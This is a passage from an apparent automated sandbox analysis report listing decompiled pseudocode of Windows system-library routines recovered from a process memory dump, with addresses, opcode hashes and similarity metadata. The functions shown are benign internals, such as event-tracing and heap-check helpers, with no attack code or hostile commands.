					E0350165E(__ebx, 0x3528ae4, (__edx -  *0x3528b04 >> 0x14) + (__edx -  *0x3528b04 >> 0x14), __edi, __ecx, (__edx -  *0x3528b04 >> 0x14) + (__edx -  *0x3528b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E034FAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03457D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E034EFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                          0x03501074
                                                          0x03501080
                                                          0x03501082
                                                          0x0350108a
                                                          0x0350108f
                                                          0x03501093
                                                          0x035010ab
                                                          0x035010ab
                                                          0x035010c3
                                                          0x035010cf
                                                          0x035010e1
                                                          0x035010d1
                                                          0x035010da
                                                          0x035010da
                                                          0x035010e9
                                                          0x035010f5
                                                          0x035010f5
                                                          0x035010fe

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6525bbe4302197ea2050f647d56b1b42e571b9d8975d63615abdded95b70330d
                                                          • Instruction ID: dd2b8386a4d647aa9acbe20781d46e3d4f89b4fc41013751b1b4ddd2b33ec54f
                                                          • Opcode Fuzzy Hash: 6525bbe4302197ea2050f647d56b1b42e571b9d8975d63615abdded95b70330d
                                                          • Instruction Fuzzy Hash: F701287A604B419FC710EF6AD940B1AB7E5BB84310F04C529F8858B6E0DE32D644CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344B02A, Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0344B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03457D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E034B7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                          0x0344b037
                                                          0x0344b039
                                                          0x0344b03b
                                                          0x0344b040
                                                          0x0349a60e
                                                          0x00000000
                                                          0x00000000
                                                          0x0349a61d
                                                          0x0344b04b
                                                          0x0344b04e
                                                          0x0349a627
                                                          0x0349a634
                                                          0x00000000
                                                          0x00000000
                                                          0x0349a641
                                                          0x0349a653
                                                          0x0349a643
                                                          0x0349a64c
                                                          0x0349a64c
                                                          0x0349a65b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0349a66c
                                                          0x0344b057
                                                          0x0344b057
                                                          0x0344b057
                                                          0x0344b046
                                                          0x0344b046
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                          • Instruction ID: 59954ca26890d7d2227f10fb177c12dc6d79ff8bba9b0efee35496ca9f67086b
                                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                          • Instruction Fuzzy Hash: 93017C32204A809FE722C71DC988F67BBECEB45650F0940B7F969CFB61D628DC41C628
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508A62, Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E03508A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x352d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03457D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0347B640(E03479AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                          0x03508a62
                                                          0x03508a71
                                                          0x03508a79
                                                          0x03508a82
                                                          0x03508a85
                                                          0x03508a89
                                                          0x03508a8c
                                                          0x03508a8f
                                                          0x03508a92
                                                          0x03508a95
                                                          0x03508a9f
                                                          0x03508ab1
                                                          0x03508aa1
                                                          0x03508aaa
                                                          0x03508aaa
                                                          0x03508abc
                                                          0x03508abd
                                                          0x03508abf
                                                          0x03508ac4
                                                          0x03508ada

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2dd8b854bf7e037c087cfa39d302acce1870a98558e228473ea4a78a200b1ae
                                                          • Instruction ID: f7c6c39507d410369f687729cdf807a1646f1256f4c0e33f1914bda258b4e631
                                                          • Opcode Fuzzy Hash: a2dd8b854bf7e037c087cfa39d302acce1870a98558e228473ea4a78a200b1ae
                                                          • Instruction Fuzzy Hash: 46011A75A01219AFCB00DFA9D941DEEBBB8FF58310F14406AF904FB391D635AA018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508ED6, Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E03508ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x352d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03457D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0347B640(E03479AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                          0x03508ed6
                                                          0x03508ee5
                                                          0x03508eed
                                                          0x03508ef0
                                                          0x03508efa
                                                          0x03508f03
                                                          0x03508f0c
                                                          0x03508f15
                                                          0x03508f24
                                                          0x03508f27
                                                          0x03508f31
                                                          0x03508f43
                                                          0x03508f33
                                                          0x03508f3c
                                                          0x03508f3c
                                                          0x03508f4e
                                                          0x03508f4f
                                                          0x03508f51
                                                          0x03508f56
                                                          0x03508f69

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7250bae9c695776d443add2023649e557bb8ef6a414320305dab6a11191c226
                                                          • Instruction ID: 6afc38f0e2d00f6651ca87accb8fcc570650f10738a4ed767d4233a24f6f1c1a
                                                          • Opcode Fuzzy Hash: b7250bae9c695776d443add2023649e557bb8ef6a414320305dab6a11191c226
                                                          • Instruction Fuzzy Hash: 7D110C74A002499FDB04DFA9D441AAEBBF4FB08200F1442BAE918EB392E6349940CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343DB60, Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0343DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0343DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0343E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0343E8B0(__ecx, _t14, 0xfff);
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                          0x0343db64
                                                          0x0343db66
                                                          0x0343db6b
                                                          0x0343dbaa
                                                          0x0343db71
                                                          0x0343db76
                                                          0x0343db7a
                                                          0x0343dba3
                                                          0x0343db7c
                                                          0x0343db87
                                                          0x0343db8b
                                                          0x03494fa1
                                                          0x03494fb3
                                                          0x03494fb8
                                                          0x0343db91
                                                          0x0343db96
                                                          0x0343db98
                                                          0x0343db98
                                                          0x0343db8b
                                                          0x0343db7a
                                                          0x0343db9d
                                                          0x0343dba2

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                          • Instruction ID: e2c070cb3d9e64e0078028b3c8106775cc9e346c98cc771a405ec0734ef25a32
                                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                          • Instruction Fuzzy Hash: F5F06837A456629FD732DA568880B67B6959F8BA60F19003BF5059F348CA70880296E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343B1E1, Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0343B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03457D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03457D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E034B7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                          0x0343b1e8
                                                          0x0343b1ea
                                                          0x0343b1f3
                                                          0x03494a17
                                                          0x0343b1f9
                                                          0x0343b1f9
                                                          0x0343b1f9
                                                          0x0343b201
                                                          0x03494a21
                                                          0x03494a2e
                                                          0x00000000
                                                          0x00000000
                                                          0x03494a3b
                                                          0x03494a4d
                                                          0x03494a3d
                                                          0x03494a46
                                                          0x03494a46
                                                          0x03494a55
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0343b20a
                                                          0x0343b20a
                                                          0x0343b20a
                                                          0x0343b20a

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                          • Instruction ID: 030ae419e9c76372a44badebcf6f0f4c96c565308d24c903be83288be1aed7ed
                                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                          • Instruction Fuzzy Hash: 1901D632204A809FD722D75AC808F5ABF98EF46750F0C00A3F9148F7B1D674C801C25C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034CFE87, Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E034CFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x352d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03457D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0347B640(E03479AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                          0x034cfe96
                                                          0x034cfe9e
                                                          0x034cfea1
                                                          0x034cfead
                                                          0x034cfeb3
                                                          0x034cfeb9
                                                          0x034cfec3
                                                          0x034cfed5
                                                          0x034cfec5
                                                          0x034cfece
                                                          0x034cfece
                                                          0x034cfee0
                                                          0x034cfee1
                                                          0x034cfee3
                                                          0x034cfee8
                                                          0x034cfefb

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6da28ae7ef18339cea14d061ec43c0c8bd636dc66557fa4473864e0ee7d65bc4
                                                          • Instruction ID: a41966e83f4759867c0cef02d1eec5cffa52617dd861b04c6fe28a36c88964d0
                                                          • Opcode Fuzzy Hash: 6da28ae7ef18339cea14d061ec43c0c8bd636dc66557fa4473864e0ee7d65bc4
                                                          • Instruction Fuzzy Hash: 3E016274A00348AFCB14DFA9D542A6EB7F4EF04300F14416EB914DF392D635DA06CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508F6A, Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E03508F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x352d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03457D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0347B640(E03479AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                          0x03508f6a
                                                          0x03508f79
                                                          0x03508f81
                                                          0x03508f84
                                                          0x03508f8b
                                                          0x03508f91
                                                          0x03508f94
                                                          0x03508f9e
                                                          0x03508fb0
                                                          0x03508fa0
                                                          0x03508fa9
                                                          0x03508fa9
                                                          0x03508fbb
                                                          0x03508fbc
                                                          0x03508fbe
                                                          0x03508fc3
                                                          0x03508fd6

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a02bef443e10ba706eb4be899ee91b06cd1dc7396bcf0cc7eb83858a1b7bcea0
                                                          • Instruction ID: 2e4c5252f810df61839394d76be00ef3d3c17cb943bb1633aab25a7c5b22a72c
                                                          • Opcode Fuzzy Hash: a02bef443e10ba706eb4be899ee91b06cd1dc7396bcf0cc7eb83858a1b7bcea0
                                                          • Instruction Fuzzy Hash: D6011974A01208AFCB00EFB9D545EAEB7B4EB18300F14446AB905EB391EA349A00CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034F131B, Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E034F131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x352d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03457D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0347B640(E03479AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                          0x034f131b
                                                          0x034f132a
                                                          0x034f1330
                                                          0x034f1336
                                                          0x034f133e
                                                          0x034f1341
                                                          0x034f1344
                                                          0x034f134f
                                                          0x034f1361
                                                          0x034f1351
                                                          0x034f135a
                                                          0x034f135a
                                                          0x034f136c
                                                          0x034f136d
                                                          0x034f136f
                                                          0x034f1374
                                                          0x034f1387

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9215ec87e57977547f5cbd7d534a576cb8c56687a11df6ea1ff7fa6f6fe73bb
                                                          • Instruction ID: ae985c52be50ba522b27b429854dfee6d61affa143e67dafd51f81d3c72700e6
                                                          • Opcode Fuzzy Hash: f9215ec87e57977547f5cbd7d534a576cb8c56687a11df6ea1ff7fa6f6fe73bb
                                                          • Instruction Fuzzy Hash: E6013C75A01248AFCB04EFA9D545EAEB7F4FF08700F14406AB915EF391E6349A00CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345C577, Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0345C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0345C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x34111cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E035088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                          0x0345c577
                                                          0x0345c57d
                                                          0x0345c581
                                                          0x0345c5b5
                                                          0x0345c5b9
                                                          0x0345c5ce
                                                          0x0345c5ce
                                                          0x0345c5ca
                                                          0x00000000
                                                          0x0345c5ca
                                                          0x0345c5c4
                                                          0x0345c5c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0345c5ad
                                                          0x00000000
                                                          0x0345c5af

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e73ea5dfd9e5cbca1c291473c4916d356057a072e4675ab669089590fde17d86
                                                          • Instruction ID: 0be3f08c202474efc6415ca1bb922d9c978984f9649f9550178fd799e1d05141
                                                          • Opcode Fuzzy Hash: e73ea5dfd9e5cbca1c291473c4916d356057a072e4675ab669089590fde17d86
                                                          • Instruction Fuzzy Hash: 75F06DB2D157B8DED7A1CB948084B22BBE89B05668F4844A7FC168F253C6A4DC80C258
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0347927A, Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0347927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0347FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E034792C6(_t11, _t14);
				}
				return _t11;
			}





                                                          0x03479295
                                                          0x03479299
                                                          0x0347929f
                                                          0x034792aa
                                                          0x034792ad
                                                          0x034792ae
                                                          0x034792af
                                                          0x034792b0
                                                          0x034792b4
                                                          0x034792bb
                                                          0x034792bb
                                                          0x034792c5

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction ID: 9eafec3984c3e2646e20d86a735d9ed16bc270dd800887cc8258278c686b2060
                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction Fuzzy Hash: 92E0E5322406002BD711EE06CC80B477669DF82720F04407EB9001E242C6E5D80C87A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508D34, Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 43%
                                                          			E03508D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x352d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03457D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0347B640(E03479AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                          0x03508d34
                                                          0x03508d43
                                                          0x03508d4b
                                                          0x03508d4e
                                                          0x03508d52
                                                          0x03508d5c
                                                          0x03508d6e
                                                          0x03508d5e
                                                          0x03508d67
                                                          0x03508d67
                                                          0x03508d79
                                                          0x03508d7a
                                                          0x03508d7c
                                                          0x03508d81
                                                          0x03508d94

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b883aa1623b74809943844fe589c9c886e47b06edebc9f745bb3e8e359debb19
                                                          • Instruction ID: 47a50408c622cc7a5b04321f84053eb2ca1c9851aa8fbd3d13539b266b8808ae
                                                          • Opcode Fuzzy Hash: b883aa1623b74809943844fe589c9c886e47b06edebc9f745bb3e8e359debb19
                                                          • Instruction Fuzzy Hash: D8F09075A047089FCB14EBB9D541EAEB7B4EB14200F1080AAE915AF291EA34D9008798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034F2073, Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E034F2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E034EFD22(__ecx);
				_t19 =  *0x352849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3528748; // 0x0
					if(__eflags <= 0) {
						E034F1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3528724 & 0x00000004;
							if(( *0x3528724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3528724; // 0x0
					return E034E8DF1(__ebx, 0xc0000374, 0x3525890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                          0x034f2076
                                                          0x034f2078
                                                          0x034f207d
                                                          0x034f2083
                                                          0x034f20a4
                                                          0x034f20aa
                                                          0x034f20ac
                                                          0x034f20b7
                                                          0x034f20ba
                                                          0x034f20bc
                                                          0x034f20c9
                                                          0x034f20c9
                                                          0x034f20d0
                                                          0x034f20d2
                                                          0x00000000
                                                          0x034f20d2
                                                          0x034f20be
                                                          0x034f20c3
                                                          0x034f20c5
                                                          0x034f20c7
                                                          0x00000000
                                                          0x00000000
                                                          0x034f20c7
                                                          0x034f20bc
                                                          0x034f20d4
                                                          0x034f2085
                                                          0x034f2085
                                                          0x034f20a3
                                                          0x034f20a3

                                                          Memory Dump Source
